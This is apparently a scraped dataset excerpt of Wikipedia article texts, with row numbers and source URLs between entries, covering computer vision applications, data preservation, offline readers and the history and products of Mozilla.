and providing high-level information about the environment and the robot Besides the above-mentioned views on computer vision, many of the related research topics can also be studied from a purely mathematical point of view. For example, many methods in computer vision are based on statistics, optimization or geometry. Finally, a significant part of the field is devoted to the implementation aspect of computer vision; how existing methods can be realized in various combinations of software and hardware, or how these methods can be modified in order to gain processing speed without losing too much performance. Computer vision is also used in fashion eCommerce, inventory management, patent search, furniture, and the beauty industry. 23 The fields most closely related to computer vision are image processing, image analysis and machine vision. There is a significant overlap in the range of techniques and applications that these cover. This implies that the basic techniques that are used and developed in these fields are similar, something which can be interpreted as there is only one field with different names. On the other hand, it appears to be necessary for research groups, scientific journals, conferences, and companies to present or market themselves as belonging specifically to one of these fields and, hence, various characterizations which distinguish each of the fields from the others have been presented. In image processing, the input is an image and the output is an image as well, whereas in computer vision, an image or a video is taken as an input and the output could be an enhanced image, an understanding of the content of an image or even behavior of a computer system based on such understanding. Computer graphics produces image data from 3D models, and computer vision often produces 3D models from image data. 24 There is also a trend towards a combination of the two disciplines, e.g., as explored in augmented reality. The following characterizations appear relevant but should not be taken as universally accepted: Photogrammetry also overlaps with computer vision, e.g., stereophotogrammetry vs. computer stereo vision. Applications range from tasks such as industrial machine vision systems which, say, inspect bottles speeding by on a production line, to research into artificial intelligence and computers or robots that can comprehend the world around them. The computer vision and machine vision fields have significant overlap. Computer vision covers the core technology of automated image analysis which is used in many fields. Machine vision usually refers to a process of combining automated image analysis with other methods and technologies to provide automated inspection and robot guidance in industrial applications. In many computer-vision applications, computers are pre-programmed to solve a particular task, but methods based on learning are now becoming increasingly common. Examples of applications of computer vision include systems for: One of the most prominent application fields is medical computer vision, or medical image processing, characterized by the extraction of information from image data to diagnose a patient. An example of this is the detection of tumours, arteriosclerosis or other malign changes, and a variety of dental pathologies; measurements of organ dimensions, blood flow, etc. are another example. It also supports medical research by providing new information: e.g., about the structure of the brain or the quality of medical treatments. Applications of computer vision in the medical area also include enhancement of images interpreted by humans—ultrasonic images or X-ray images, for example—to reduce the influence of noise. A second application area in computer vision is in industry, sometimes called machine vision, where information is extracted for the purpose of supporting a production process. One example is quality control where details or final products are being automatically inspected in order to find defects. One of the most prevalent fields for such inspection is the Wafer industry in which every single Wafer is being measured and inspected for inaccuracies or defects to prevent a computer chip from coming to market in an unusable manner. Another example is a measurement of the position and orientation of details to be picked up by a robot arm. Machine vision is also heavily used in the agricultural processes to remove undesirable foodstuff from bulk material, a process called optical sorting. 30 Military applications are probably one of the largest areas of computer vision citation needed . The obvious examples are the detection of enemy soldiers or vehicles and missile guidance. More advanced systems for missile guidance send the missile to an area rather than a specific target, and target selection is made when the missile reaches the area based on locally acquired image data. Modern military concepts, such as "battlefield awareness", imply that various sensors, including image sensors, provide a rich set of information about a combat scene that can be used to support strategic decisions. In this case, automatic processing of the data is used to reduce complexity and to fuse information from multiple sensors to increase reliability. One of the newer application areas is autonomous vehicles, which include submersibles, land-based vehicles (small robots with wheels, cars, or trucks), aerial vehicles, and unmanned aerial vehicles (UAV). The level of autonomy ranges from fully autonomous (unmanned) vehicles to vehicles where computer-vision-based systems support a driver or a pilot in various situations. Fully autonomous vehicles typically use computer vision for navigation, e.g., for knowing where they are or mapping their environment (SLAM), for detecting obstacles. It can also be used for detecting certain task-specific events, e.g., a UAV looking for forest fires. Examples of supporting systems are obstacle warning systems in cars, cameras and LiDAR sensors in vehicles, and systems for autonomous landing of aircraft. Several car manufacturers have demonstrated systems for autonomous driving of cars. There are ample examples of military autonomous vehicles ranging from advanced missiles to UAVs for recon missions or missile guidance. Space exploration is already being made with autonomous vehicles using computer vision, e.g., NASA's Curiosity and CNSA's Yutu 2 rover. Materials such as rubber and silicon are being used to create sensors that allow for applications such as detecting microundulations and calibrating robotic hands. Rubber can be used in order to create a mold that can be placed over a finger, inside of this mold would be multiple strain gauges. The finger mold and sensors could then be placed on top of a small sheet of rubber containing an array of rubber pins. A user can then wear the finger mold and trace a surface. A computer can then read the data from the strain gauges and measure if one or more of the pins are being pushed upward. If a pin is being pushed upward then the computer can recognize this as an imperfection in the surface. This sort of technology is useful in order to receive accurate data on imperfections on a very large surface. 31 Another variation of this finger mold sensor are sensors that contain a camera suspended in silicon. The silicon forms a dome around the outside of the camera and embedded in the silicon are point markers that are equally spaced. These cameras can then be placed on devices such as robotic hands in order to allow the computer to receive highly accurate tactile data. 32 Other application areas include: Each of the application areas described above employ a range of computer vision tasks; more or less well-defined measurement problems or processing problems, which can be solved using a variety of methods. Some examples of typical computer vision tasks are presented below. Computer vision tasks include methods for acquiring, processing, analyzing and understanding digital images, and extraction of high-dimensional data from the real world in order to produce numerical or symbolic information, e.g., in the forms of decisions. 1 2 3 4 Understanding in this context means the transformation of visual images (the input of the retina) into descriptions of the world that can interface with other thought processes and elicit appropriate action. This image understanding can be seen as the disentangling of symbolic information from image data using models constructed with the aid of geometry, physics, statistics, and learning theory. 37 The classical problem in computer vision, image processing, and machine vision is that of determining whether or not the image data contains some specific object, feature, or activity. Different varieties of recognition problem are described in the literature. 38 Currently, the best algorithms for such tasks are based on convolutional neural networks. An illustration of their capabilities is given by the ImageNet Large Scale Visual Recognition Challenge; this is a benchmark in object classification and detection, with millions of images and 1000 object classes used in the competition. 39 Performance of convolutional neural networks on the ImageNet tests is now close to that of humans. 39 The best algorithms still struggle with objects that are small or thin, such as a small ant on the stem of a flower or a person holding a quill in their hand. They also have trouble with images that have been distorted with filters (an increasingly common phenomenon with modern digital cameras). By contrast, those kinds of images rarely trouble humans. Humans, however, tend to have trouble with other issues. For example, they are not good at classifying objects into fine-grained classes, such as the particular breed of dog or species of bird, whereas convolutional neural networks handle this with ease. citation needed Several specialized tasks based on recognition exist, such as: Several tasks relate to motion estimation, where an image sequence is processed to produce an estimate of the velocity either at each points in the image or in the 3D scene or even of the camera that produces the images. Examples of such tasks are: Given one or (typically) more images of a scene, or a video, scene reconstruction aims at computing a 3D model of the scene. In the simplest case, the model can be a set of 3D points. More sophisticated methods produce a complete 3D surface model. The advent of 3D imaging not requiring motion or scanning, and related processing algorithms is enabling rapid advances in this field. Grid-based 3D sensing can be used to acquire 3D images from multiple angles. Algorithms are now available to stitch multiple 3D images together into point clouds and 3D models. 24 Image restoration comes into the picture when the original image is degraded or damaged due to some external factors like lens wrong positioning, transmission interference, low lighting or motion blurs, etc., which is referred to as noise. When the images are degraded or damaged, the information to be extracted from them also gets damaged. Therefore we need to recover or restore the image as it was intended to be. The aim of image restoration is the removal of noise (sensor noise, motion blur, etc.) from images. The simplest possible approach for noise removal is various types of filters, such as low-pass filters or median filters. More sophisticated methods assume a model of how the local image structures look to distinguish them from noise. By first analyzing the image data in terms of the local image structures, such as lines or edges, and then controlling the filtering based on local information from the analysis step, a better level of noise removal is usually obtained compared to the simpler approaches. An example in this field is inpainting. The organization of a computer vision system is highly application-dependent. Some systems are stand-alone applications that solve a specific measurement or detection problem, while others constitute a sub-system of a larger design which, for example, also contains sub-systems for control of mechanical actuators, planning, information databases, man-machine interfaces, etc. The specific implementation of a computer vision system also depends on whether its functionality is pre-specified or if some part of it can be learned or modified during operation. Many functions are unique to the application. There are, however, typical functions that are found in many computer vision systems. Image-understanding systems (IUS) include three levels of abstraction as follows: low level includes image primitives such as edges, texture elements, or regions; intermediate level includes boundaries, surfaces and volumes; and high level includes objects, scenes, or events. Many of these requirements are entirely topics for further research. The representational requirements in the designing of IUS for these levels are: representation of prototypical concepts, concept organization, spatial knowledge, temporal knowledge, scaling, and description by comparison and differentiation. While inference refers to the process of deriving new, not explicitly represented facts from currently known facts, control refers to the process that selects which of the many inference, search, and matching techniques should be applied at a particular stage of processing. Inference and control requirements for IUS are: search and hypothesis activation, matching and hypothesis testing, generation and use of expectations, change and focus of attention, certainty and strength of belief, inference and goal satisfaction. 46 There are many kinds of computer vision systems; however, all of them contain these basic elements: a power source, at least one image acquisition device (camera, ccd, etc.), a processor, and control and communication cables or some kind of wireless interconnection mechanism. In addition, a practical vision system contains software, as well as a display in order to monitor the system. Vision systems for inner spaces, as most industrial ones, contain an illumination system and may be placed in a controlled environment. Furthermore, a completed system includes many accessories, such as camera supports, cables, and connectors. Most computer vision systems use visible-light cameras passively viewing a scene at frame rates of at most 60 frames per second (usually far slower). A few computer vision systems use image-acquisition hardware with active illumination or something other than visible light or both, such as structured-light 3D scanners, thermographic cameras, hyperspectral imagers, radar imaging, lidar scanners, magnetic resonance images, side-scan sonar, synthetic aperture sonar, etc. Such hardware captures "images" that are then processed often using the same computer vision algorithms used to process visible-light images. While traditional broadcast and consumer video systems operate at a rate of 30 frames per second, advances in digital signal processing and consumer graphics hardware has made high-speed image acquisition, processing, and display possible for real-time systems on the order of hundreds to thousands of frames per second. For applications in robotics, fast, real-time video systems are critically important and often can simplify the processing needed for certain algorithms. When combined with a high-speed projector, fast image acquisition allows 3D measurement and feature tracking to be realized. 47 Egocentric vision systems are composed of a wearable camera that automatically take pictures from a first-person perspective. As of 2016, vision processing units are emerging as a new class of processors to complement CPUs and graphics processing units (GPUs) in this role. 48 |
358 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_preservation | Data preservation is the act of conserving and maintaining both the safety and integrity of data. Preservation is done through formal activities that are governed by policies, regulations and strategies directed towards protecting and prolonging the existence and authenticity of data and its metadata. 1 Data can be described as the elements or units in which knowledge and information is created, 2 and metadata are the summarizing subsets of the elements of data; or the data about the data. 3 The main goal of data preservation is to protect data from being lost or destroyed and to contribute to the reuse and progression of the data. Most historical data collected over time has been lost or destroyed. War and natural disasters combined with the lack of materials and necessary practices to preserve and protect data has caused this. Usually, only the most important data sets were saved, such as government records and statistics, legal contracts and economic transactions. Scientific research and doctoral theses data have mostly been destroyed from improper storage and lack of data preservation awareness and execution. 4 Over time, data preservation has evolved and has generated importance and awareness. We now have many different ways to preserve data and many different important organizations involved in doing so. The first digital data preservation storage solutions appeared in the 1950s, which were usually flat or hierarchically structured. 5 While there were still issues with these solutions, it made storing data much cheaper, and more easily accessible. In the 1970s relational databases as well as spreadsheets appeared. Relational data bases structure data into tables using structured query languages which made them more efficient than the preceding storage solutions, and spreadsheets hold high volumes of numeric data which can be applied to these relational databases to produce derivative data. More recently, non-relational (non-structured query language) databases have appeared as complements to relational databases which hold high volumes of unstructured or semi-structured data. 4 The scope of data preservation is vast. Everything from governmental to business records to art essentially can be represented as data, and is amenable to be lost. This then leads to loss of human history, for perpetuity. Data can be lost on a small or independent scale whether it's personal data loss, or data loss within businesses and organizations, as well as on a larger or national or global scale which can negatively and potentially permanently affect things such as environmental protection, medical research, homeland security, public health and safety, economic development 6 and culture. The mechanisms of data loss are also as many as they are varied, spanning from disaster, wars, data breaches, negligence, all the way through simple forgetting to natural decay. Ways in which data collections can be used when preserved and stored properly can be seen through the U.S. Geological Survey, which stores data collections on natural hazards, natural resources, and landscapes. The data collected by the Survey is used by federal and state land management agencies towards land use planning and management, and continually needs access to historical reference data. 6 In contrast, data holdings are collections of gathered data that are informally kept, and not necessarily prepared for long-term preservation. For example, a collection or back-up of personal files. Data holdings are generally the storage methods used in the past when data has been lost due to environmental and other historical disasters. 4 Furthermore, data retention differs from data preservation in the sense that by definition, to retain an object (data) is to hold or keep possession or use of the object. 7 To preserve an object is to protect, maintain and keep up for future use. 8 Retention policies often circle around when data should be deleted on purpose as well, and held from public access, while preservation prioritizes permanence and more widely-shared access. Thus, data preservation exceeds the concept of having or possessing data or back up copies of data. Data preservation ensures reliable access to data by including back-up and recovery mechanisms that precede the event of a disaster or technological change. 9 Digital preservation, is similar to data preservation, but is mainly concerned with technological threats, and solely digital data. Essentially digital data is a set of formal activities to enable ongoing or persistent use and access of digital data exceeding the occurrence of technological malfunction or change. 10 Digital preservation is aware of the inevitable change in technology and protocols, and prepares for data will need to be accessible across new types of technologies and platforms while being the integrity of the data and metadata being conserved. 4 Technology, while providing great process in conserving data that may not have been possible in the past, is also changing at such a quick rate that digital data may not be accessible anymore due to the format being incompatible with new software. Without the use of data preservation much of our existing digital data is at risk. 9 The majority of methods used towards data preservation today are digital methods, which are so far the most effective methods that exist. Archives are a collection of historical documents and records. Archives contribute and work towards the preservation of data by collecting data that is well organized, while providing the appropriate metadata to confirm it. 11 An example of an important data archive is The LONI Image Data Archive, which is an archive that collects data regarding clinical trials and clinical research studies. 12 Catalogues, directories and portals are consolidated resources which are kept by individual institutions, and are associated with data archives and holdings. 4 In other words, the data is not presented on the site, but instead might act as metadata and aggregators, and may administer thorough inventories. 13 Repositories are places where data archives and holdings can be accessed and stored. The goal of repositories is to make sure that all requirements and protocols of archives and holdings are being met, and data is being certified to ensure data integrity and user trust. 4 Single-site Repositories A repository that holds all data sets on a single site. 4 An example of a major single-site repository the Data Archiving and Networking Services which is a repository which provides ongoing access to digital research resources for the Netherlands. 14 Multi-Site Repositories A repository that hosts data set on multiple institutional sites. 4 An example of a well known multi-site repository is OpenAIRE which is a repository that hosts research data and publications collaborating all of the EU countries and more. OpenAIRE promotes open scholarship and seeks to improves discover-ability and re-usability of data. 15 Trusted Digital Repository A repository that seeks to provide reliable, trusted access over a long period of time. The repository can be single or multi-sited but must cooperate with the Reference Model for an Open Archival Information System, 16 as well as adhere to a set of rules or attributes that contribute to its trust such as having persistent financial responsibility, organizational buoyancy, administrative responsibility security and safety. 4 An example of a trusted digital repository is The Digital Repository of Ireland (DRI) which is a multi-site repository that hosts Ireland's humanity and social science data sets. 17 Cyber infrastructures which consists of archive collections which are made available through the system of hardware, technologies, software, policies, services and tools. Cyber infrastructures are geared towards the sharing of data supporting peer-to-peer collaborations and a cultural community. 3 An example of a major cyber-infrastructure is The Canadian Geo-spatial Data Infrastructure which provides access to spatial data in Canada. 18 |
359 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Offline_reader | An offline reader (sometimes called an offline browser or offline navigator) is computer software that downloads e-mail, newsgroup posts or web pages, making them available when the computer is offline: not connected to a server. a Offline readers are useful for portable computers and dial-up access. Website mirroring software is software that allows for the download of a copy of an entire website to the local hard disk for offline browsing. In effect, the downloaded copy serves as a mirror of the original site. Web crawler software such as Wget can be used to generate a site mirror. Offline mail readers are computer programs that allow users to read electronic mail or other messages (for example, those on bulletin board systems) with a minimum of connection time to the server storing the messages. BBS servers accomplished this by packaging up multiple messages into a compressed file, e.g., a QWK packet, for the user to download using, e.g., Xmodem, Ymodem, Zmodem, and then disconnect. The user reads and replies to the messages locally and packages up and uploads any replies or new messages back to the server upon the next connection. Internet mail servers using POP3 or IMAP4 send the messages uncompressed as part of the protocol, and outbound messages using SMTP are also uncompressed. Offline news readers using NNTP are similar, but the messages are organized into news groups. Most e-mail protocols, like the common POP3 and IMAP4 used for internet mail, need be on-line only during message transfer; the same applies to the NNTP protocol used by Usenet (Network news). Most end-user mailers, such as Outlook Express and AOL, can be used offline even if they are mainly intended to be used online, but some mailers such as Juno are mainly intended to be used offline. Off-line mail readers are generally considered to be those systems that did not originally offer such functionality, notably on bulletin board systems where toll charges and tying up telephone lines were a major concern. Users of large networks such as FidoNet regularly used offline mail readers, and it was also used for UseNet messages on the internet, which is also an on-line system. The two most common formats for FidoNet BBS's were Blue Wave and QWK. Less well-known examples include Silver Xpress's OPX, XRS, OMEM, SOUP and ZipMail. This article related to a type of software is a stub. You can help Wikipedia by expanding it. |
360 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Mozilla | Mozilla (stylized as moz: a) is a free software community founded in 1998 by members of Netscape. The Mozilla community uses, develops, publishes and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. 1 The community is supported institutionally by the non-profit Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation. 2 Mozilla's current products include the Firefox web browser, Thunderbird e-mail client (now through a subsidiary), the Bugzilla bug tracking system, the Gecko layout engine, and the Pocket "read-it-later-online" service. 3 On January 23, 1998, Netscape announced that its Netscape Communicator browser software would be free, and that its source code would also be free. 4 One day later, Jamie Zawinski of Netscape registered mozilla.org. 5 The project took its name, "Mozilla", from the original code name of the Netscape Navigator browser—a portmanteau of "Mosaic and Godzilla", 6 and used to coordinate the development of the Mozilla Application Suite, the free software version of Netscape's internet software, Netscape Communicator. 7 8 Zawinski said he arrived at the name "Mozilla" at a Netscape staff meeting. 9 A small group of Netscape employees were tasked with coordinating the new community. Mozilla originally aimed to be a technology provider for companies such as Netscape, who would commercialize their free software code. 10 When Netscape's parent company AOL greatly reduced its involvement with Mozilla in July 2003, the Mozilla Foundation was designated the project's legal steward. 11 Soon after, Mozilla deprecated the Mozilla Suite in favor of creating independent applications for each function, primarily the Firefox web browser and the Thunderbird email client, and moved to supply them directly to the public. 12 Mozilla's activities next expanded, and also experienced product terminations, with Firefox on mobile platforms (primarily Android), 13 a mobile OS called Firefox OS (since cancelled), 14 a web-based identity system called Mozilla Persona (since cancelled) and a marketplace for HTML5 applications. 15 In a report released in November 2012, Mozilla reported that their revenue for 2011 was $163 million, up 33% from $123 million in 2010. It noted that roughly 85% of their revenue came from their contract with Google. 16 At the end of 2013, Mozilla announced a deal with Cisco, whereby Firefox would download and use a Cisco-provided binary build of an open-source 17 codec to play the proprietary H.264 video format. 18 19 As part of the deal, Cisco would pay any patent licensing fees associated with the binaries that it distributed. Mozilla's CTO, Brendan Eich, acknowledged that it was "not a complete solution" and wasn't "perfect". 20 An employee in Mozilla's video formats team, writing unofficially, justified it by the need to maintain their large user base, which would be necessary for future battles for truly free video formats. 21 In December 2013, Mozilla announced funding for the development of paid games 22 through its Game Creator Challenge. However, even games that would be released under non-free or free software licenses were required to be made with open web technologies and Javascript. In January 2017 the company rebranded away from its dinosaur symbol in favor of a logo including a : character sequence from a URL: "moz: a". 23 As a part of the rebranding, it commissioned the open source slab serif font Zilla Slab. 24 In 2020 Mozilla announced it would cut 25% of its worldwide staff of nearly 1,000 to reduce costs. Firefox has fallen from 30% market share to 4% in 10 years. Despite this, executive pay increased 400%, with Mitchell Baker, Mozilla’s top executive, receiving $2.4m in 2018. 25 In December 2020, Mozilla closed its Mountain View office. 26 Seeking new products and roles while sustaining commitment to Firefox though Firefox's market share has so far dwindled dramatically, Executive Chairwoman and CEO Baker, Chief Product Officer Steve Teixeira and Mozilla Foundation Executive Director Mark Surman told Tech Crunch in November 2022 that fundamental business models are being rethought, and new roles in the internet as a human institution, that Mozilla's next 25 years' plan was in search of specifying projects for revised detailed purposes. The one actual general vehicle implemented "has meant the launch of Mozilla Ventures, a $35 million venture fund that the organization plans to use to invest in products and founders who want to build a better, privacy-respecting internet. 27 The Mozilla Manifesto outlines Mozilla's goals and principles. 28 It asserts Mozilla's commitment to the internet, saying: "The open, global internet is the most powerful communication and collaboration resource we have ever seen. It embodies some of our deepest hopes for human progress. It then outlines what Mozilla sees as its place in the development of the internet, stating "The Mozilla project uses a community-based approach to create world-class open source software and to develop new types of collaborative activities". And finally, it lays out their ten principles: According to the Mozilla Foundation: 29 The Mozilla Foundation pledges to support the Mozilla Manifesto in its activities. Specifically, we will: Throughout the 2020 year, Mozilla ran Mozilla Builders, "an experimental 'Fix-The-Internet' incubator program". It funded 80 projects through three subprograms: The Startup Studio, The MVP Lab and The Open Lab. 30 The site for this program is now archived. 31 On November 2, 2022, at the Web Summit in Lisbon, Portugal 32 and simultaneously online, Mozilla announced the early 2023 launch of Mozilla Ventures, a venture capital and product incubation facility out of Mozilla for independent start-ups, seed to Series A which qualify under the ethos of the Mozilla Manifesto, with a starting fund of $35 million. Its founding Managing Partner is Mohamed Nanabhay who told Entrepreneur India the purpose is "to create an ecosystem of entrepreneurs from across the world who are building companies that create a better internet". 33 Mozilla Foundation President and Executive Director Mark Surman named the first 3 investment recipients in the Mozilla Ventures mode, in discussions before Mozilla Ventures was announced, as Secure AI Labs, Block Party and HeyLogin. 34 Firefox is a family of software products developed by Mozilla, with the Firefox browser as the flagship product. 36 37 The Firefox web browser is available in both desktop and mobile versions. It uses the Gecko layout engine to render web pages, which implements current and anticipated web standards. 38 As of late 2015 update , Firefox had approximately 10 11% of worldwide usage share of web browsers, making it the 4th most-used web browser. 39 40 41 Firefox began as an experimental branch of the Mozilla codebase by Dave Hyatt, Joe Hewitt and Blake Ross, who believed the commercial requirements of Netscape's sponsorship and developer-driven feature creep compromised the utility of the Mozilla browser. 42 To combat what they saw as the Mozilla Suite's software bloat, they created a stand-alone browser, with which they intended to replace the Mozilla Suite. Firefox was originally named Phoenix but the name was changed to avoid trademark conflicts with Phoenix Technologies. The initially-announced replacement, Firebird, provoked objections from the Firebird project community. 43 44 The current name, Firefox, was chosen on February 9, 2004. 45 It was previously announced that Mozilla would launch a premium version of the Firefox browser by October 2019. The company's CEO, Chris Beard, was quoted by The Next Web: "there is no plan to charge money for things that are now free. So we will roll out a subscription service and offer a premium level. 46 In September, Mozilla revealed their new offering, Firefox Premium Support, at $10 per installation. 47 However, shortly after news broke of the service, Mozilla removed information about it from the website. Computerworld reported that in an email statement, Mozilla claimed "the page outlining that these paid support services for enterprise clients will be available was posted incorrectly. 48 In October 2023, Mozilla announced that consumer 'Firefox accounts' were renamed to 'Mozilla accounts', explicitly indicating a desire to bring the Mozilla brand into greater prominence even with the diminution of some Firefox branding: Over the years, Firefox accounts expanded its role beyond being solely an authentication solution for Firefox Sync. It now serves as Mozilla's main authentication and account management service for a wide range of products and services, supporting millions of active account customers globally. As such, the original “Firefox” branding no longer accurately reflects the broad scope of Mozilla's offerings. The renaming is intended to create a more consistent brand experience across all Mozilla surfaces, driving higher awareness of the portfolio of Mozilla products. 49 Firefox for mobile (codenamed Fennec) is the build of the Mozilla Firefox web browser for mobile devices such as smartphones and tablet computers. Initially available on multiple platforms, it is now available in two versions: Firefox for Android and Firefox for iOS. Firefox for Android runs on the Android mobile operating system and uses the same Gecko layout engine as Mozilla Firefox; for example, version 1.0 used the same engine as Firefox 3.6, and the following release, 4.0, shared core code with Firefox 4.0. Firefox for iOS, which runs on the iOS mobile operating system, does not use the Gecko Layout Engine because of Apple's policy that all iOS apps that browse the web must use the built-in iOS WebKit rendering engine. 50 51 Both version include features like HTML5 support, Firefox Sync, private browsing, web tracking protection, and tabbed browsing, and Firefox for Android also includes support for add-ons. 52 Firefox Focus is a free and open-source privacy-focused mobile browser for Android and iOS. 53 Initially released in 2015 as only a tracker-blocking application for iOS, it has since been developed into a full mobile browser for both iOS and Android. 54 Firefox Lockwise was a password manager offered by Mozilla. 55 On desktop, it was a built-in feature of the Firefox browser. On mobile, it was offered as a standalone app that could be set as the device's default password manager. Firefox Monitor is an online service that informs users if their email address and passwords have been leaked in data breaches. 56 Firefox Send was an online encrypted file-transfer service offered by Mozilla. 57 In September 2020, Mozilla announced that it would be decommissioned and would no longer be part of the product lineup. 58 Mozilla VPN, formerly Firefox Private Network, is a subscription-based VPN and a free privacy extension. 59 60 Firefox Private Relay provides users with disposable email addresses that can be used to combat spam (by hiding the user's real email address) and manage email subscriptions by categorizing them based on the party a particular address was given to. 61 Firefox Relay was first released as a Firefox add-on on April 9, 2020. Mozilla announced Firefox Relay Premium monthly subscription service, ending Beta version of Firefox Relay on November 19, 2021. In addition to this, users who benefit from the subscription can receive unlimited alias emails as username username.mozmail.com as relay.firefox.com Instead of the pseudonymous e-mail addresses provided, mozmail.com e-mail addresses have been switched. In September 2018, Mozilla announced that its VR version was ready for consumers to download. Called Firefox Reality, the browser was built entirely for virtual reality. It is currently available on the Oculus. 62 In January 2019, HTC announced its partnership with Mozilla, under which the Firefox Reality web browser has been made available on Vive headsets. 63 In February 2022, Mozilla announced that Igalia had assumed stewardship of the project, whose name was changed to Wolvic. 64 Mozilla does not support Firefox Reality anymore. 65 Firefox OS (project name: Boot to Gecko also known as B2G) is a free software operating system developed by Mozilla to support HTML5 apps written using "open Web" technologies rather than platform-specific native APIs. The concept behind Firefox OS is that all user-accessible software will be HTML5 applications, using Open Web APIs to access the phone's hardware directly via JavaScript. 66 Some devices using the OS include 67 Alcatel One Touch Fire, ZTE Open, and LG Fireweb. Mozilla announced the end of Firefox OS development in December 2015. A fork of B2G, KaiOS, has continued development and ships with numerous low-cost devices. Pocket is a mobile application and web service for managing a reading list of articles from the Internet. It was announced that it would be acquired by the Mozilla Corporation, the commercial arm of Mozilla's non-profit development group, on February 27, 2017. 68 Originally designed only for desktop browsers, 69 it is now available for macOS, Windows, iOS, Android, Windows Phone, BlackBerry, Kobo eReaders, and web browsers. 70 Thunderbird is a free software, cross-platform email and news client developed by the volunteers of the Mozilla Community. On July 16, 2012, Mitchell Baker announced that Mozilla's leadership had come to the conclusion that ongoing stability was the most important thing for Thunderbird and that innovation in Thunderbird was no longer a priority for Mozilla. In that update, Baker also suggested that Mozilla had provided a pathway for its community to innovate around Thunderbird if the community chooses. 71 On July 11, 2023, the Thunderbird blog announced the release of a new version of Thunderbird called Supernova. It features a new, modernized, user interface, among other new features. Changes have also been made to the older underlying code structure to make "maintenance and extensibility easier". 72 SeaMonkey (formerly the Mozilla Application Suite) is a free and open-source cross-platform suite of Internet software components including a web browser component, a client for sending and receiving email and Usenet newsgroup messages, an HTML editor (Mozilla Composer) and the ChatZilla IRC client. On March 10, 2005, the Mozilla Foundation announced that it would not release any official versions of Mozilla Application Suite beyond 1.7.x, since it had now focused on the stand-alone applications Firefox and Thunderbird. 73 SeaMonkey is now maintained by the SeaMonkey Council, which has trademarked the SeaMonkey name with help from the Mozilla Foundation. 74 The Mozilla Foundation provides project hosting for the SeaMonkey developers. Bugzilla is a web-based general-purpose bug tracking system, which was released as free software by Netscape Communications in 1998 along with the rest of the Mozilla codebase, and is currently stewarded by Mozilla. It has been adopted by a variety of organizations for use as a bug tracking system for both free and open-source software and proprietary projects and products, including the Mozilla Foundation, the Linux kernel, KDE, Red Hat, Eclipse and LibreOffice. 75 WebThings is a framework that allowed management of IoT devices through a single framework, gateway and UI. 76 77 78 It was based on W3C Web of Things standard. Since 2020, it is no longer affiliated with Mozilla. 79 It was spun off as an independent project following layoffs in 2020. It was known as Project Things and allowed users to use a Raspberry Pi as a gateway for IoT management with decentralized software. Network Security Services (NSS) comprises a set of libraries designed to support cross-platform development of security-enabled client and server applications. NSS provides a complete free software implementation of crypto libraries supporting SSL and S MIME. NSS is licensed under the GPL-compatible Mozilla Public License 2.0. AOL, Red Hat, Sun Microsystems Oracle Corporation, Google and other companies and individual contributors have co-developed NSS and it is used in a wide range of non-Mozilla products including Evolution, Pidgin, and LibreOffice. SpiderMonkey is the original JavaScript engine developed by Brendan Eich when he invented JavaScript in 1995 as a developer at Netscape. It became part of the Mozilla product family when Mozilla inherited Netscape's code-base in 1998. In 2011, Eich transferred the nominal ownership of the SpiderMonkey code and project to Dave Mandelin. 80 SpiderMonkey is a cross-platform engine written in C which implements ECMAScript, a standard developed from JavaScript. 80 81 It comprises an interpreter, several just-in-time compilers, a decompiler and a garbage collector. Products which embed SpiderMonkey include Firefox, Thunderbird, SeaMonkey, and many non-Mozilla applications. 82 Rhino is a free software JavaScript engine managed by the Mozilla Foundation. Developed entirely in Java, it converts JavaScript scripts into Java classes. It works in both compiled and interpreted mode. 83 Gecko is a layout engine that supports web pages written using HTML, SVG, and MathML. Written in C , it uses NSPR for platform independence. Its source code is licensed under the Mozilla Public License. Firefox uses Gecko for rendering web pages and for rendering its user interface. Gecko is also used by Thunderbird, SeaMonkey, and many non-Mozilla applications. Rust is a compiled programming language developed by Mozilla Research. It is designed for safety, concurrency and performance. It is intended for creating large, complex software which must be both fast and safe against exploits. Rust is being used in an experimental layout engine, Servo, which was developed by Mozilla and Samsung. Although Servo is not yet used in any consumer-oriented browsers, the project developers plan for parts of its source code to be incrementally merged into Gecko and Firefox. 84 85 XULRunner is a software platform and technology experiment by Mozilla that allows applications built with the same technologies used by Firefox extensions (XPCOM, Javascript, HTML, CSS, XUL) to be run natively as desktop applications, without requiring Firefox to be installed. XULRunner binaries are available for the Windows, Linux and OS X operating systems, allowing such applications to be effectively cross-platform. Pdf.js is a library developed by Mozilla that allows in-browser rendering of PDF documents using HTML5 Canvas and JavaScript. It is included by default in Firefox and Thunderbird, allowing the browser to render and edit PDF documents without requiring an external plugin. It is available separately as an extension, "PDF Viewer", for Firefox for Android, SeaMonkey, and the Firefox versions which don't include it built-in. It can also be included as part of a website's scripts, to allow PDF rendering for any browser that implements the required HTML5 features and can run JavaScript. sccache is a compiler caching tool, written in Rust similar to Ccache. 86 It acts as a compiler wrapper to avoid unnecessary compilation, storing cached results on local disks or various cloud storage backends. sccache supports caching for C C C code, Rust, and NVIDIA's CUDA using NVCC (compiler). Shumway is a free software replacement for Adobe Flash Player developed by Mozilla since 2012, using open web technologies as a replacement for Flash technologies. It uses Javascript and HTML5 Canvas elements to render Flash and execute Actionscript. It is included by default in Firefox Nightly and can be installed as an extension for any recent version of Firefox. The last implementation was limited in its capabilities to render Flash content outside simple projects. The project was cancelled in 2016. Servo is a browser engine being developed for application and embedded use. 87 In August 2020, during the COVID 19 pandemic, due to lack of funds and organization restructuring, Mozilla laid off most of the Servo development team. Servo then became part of the Linux Foundation, where development currently continues. SOPS 88 is an editor of encrypted files that supports YAML, JSON, ENV, INI and BINARY formats and encrypts with AWS KMS, GCP KMS, Azure Key Vault, age, and PGP. Taskcluster is a task execution framework supporting Mozilla's continuous integration and release processes. 89 Initially designed for Firefox's automated builds and tests, it's a flexible, scalable open-source framework. Taskcluster is used extensively for building and releasing Firefox, Thunderbird, NSS and other Mozilla projects. WebXR Viewer is an AR viewer that lets developers create and run AR experiences built with web technologies and ARKit. 90 Mozilla VR is a team focused on bringing tools, specifications, and standards to the open Web. 91 Mozilla VR maintains, a web framework for building VR experiences, and works on advancing WebVR support within web browsers. On April 26, 2018, the first experiment from their Social Mixed Reality efforts was released; Hubs, a multi-user virtual space in WebVR. 92 Following Mozilla's restructuring in 2024, the company ceased operations for its virtual reality initiative, including 